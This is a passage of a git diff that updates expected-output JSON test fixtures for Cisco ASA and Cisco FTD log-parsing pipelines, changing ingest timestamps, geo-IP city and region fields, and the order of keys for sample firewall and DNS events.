inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100647800Z", + "ingested": "2021-12-14T14:39:19.188548700Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100652300Z", + "ingested": "2021-12-14T14:39:19.188549085Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100657600Z", + "ingested": "2021-12-14T14:39:19.188549479Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100663100Z", + "ingested": "2021-12-14T14:39:19.188550089Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100669Z", + "ingested": "2021-12-14T14:39:19.188550499Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100673400Z", + "ingested": "2021-12-14T14:39:19.188550967Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100677800Z", + "ingested": "2021-12-14T14:39:19.188551652Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100681500Z", + "ingested": "2021-12-14T14:39:19.188552229Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100686Z", + "ingested": "2021-12-14T14:39:19.188552891Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100691900Z", + "ingested": "2021-12-14T14:39:19.188553323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100697800Z", + "ingested": "2021-12-14T14:39:19.188553709Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100703800Z", + "ingested": "2021-12-14T14:39:19.188554118Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100709700Z", + "ingested": "2021-12-14T14:39:19.188554498Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100715500Z", + "ingested": "2021-12-14T14:39:19.188554889Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100721300Z", + "ingested": "2021-12-14T14:39:19.188555296Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100727200Z", + "ingested": "2021-12-14T14:39:19.188555680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100733200Z", + "ingested": "2021-12-14T14:39:19.188556070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100739200Z", + "ingested": "2021-12-14T14:39:19.188556460Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100745Z", + "ingested": "2021-12-14T14:39:19.188556840Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100750900Z", + "ingested": "2021-12-14T14:39:19.188557230Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100756800Z", + "ingested": "2021-12-14T14:39:19.188557636Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100762700Z", + "ingested": "2021-12-14T14:39:19.188558026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100768500Z", + "ingested": "2021-12-14T14:39:19.188558412Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100774300Z", + "ingested": "2021-12-14T14:39:19.188558792Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100779800Z", + "ingested": "2021-12-14T14:39:19.188559180Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:34:28.100783900Z", + "ingested": "2021-12-14T14:39:19.188559564Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json index 6c4c303ea09..6b29f4ac50c 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-dns.log-expected.json @@ -4,37 +4,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 145, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -43,15 +37,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -90,7 +84,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912948400Z", + "ingested": "2021-12-14T14:39:57.642426319Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70", "code": "430003", "kind": "event", @@ -153,37 +147,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -192,15 +180,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -239,7 +227,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912957800Z", + "ingested": "2021-12-14T14:39:57.642428713Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -304,37 +292,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -343,15 +325,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -390,7 +372,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912964300Z", + "ingested": "2021-12-14T14:39:57.642429175Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -453,37 +435,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "www.elastic.co", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 200, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "www.elastic.co", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -492,15 +468,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -539,7 +515,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912970200Z", + "ingested": "2021-12-14T14:39:57.642429636Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12", "code": "430003", "kind": "event", @@ -604,37 +580,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "AAAA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 193, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "AAAA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -643,15 +613,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -690,7 +660,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912976100Z", + "ingested": "2021-12-14T14:39:57.642430030Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error", "code": "430003", "kind": "event", @@ -754,37 +724,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -793,15 +757,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -840,7 +804,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912981900Z", + "ingested": "2021-12-14T14:39:57.642430417Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", @@ -903,37 +867,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -942,15 +900,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -989,7 +947,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912987700Z", + "ingested": "2021-12-14T14:39:57.642430818Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1055,37 +1013,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1094,15 +1046,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1141,7 +1093,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912994100Z", + "ingested": "2021-12-14T14:39:57.642431210Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", @@ -1204,37 +1156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "SERVFAIL" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "SERVFAIL" }, "source": { "address": "10.0.1.20", @@ -1243,15 +1189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1290,7 +1236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.912999300Z", + "ingested": "2021-12-14T14:39:57.642431619Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -1354,37 +1300,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": 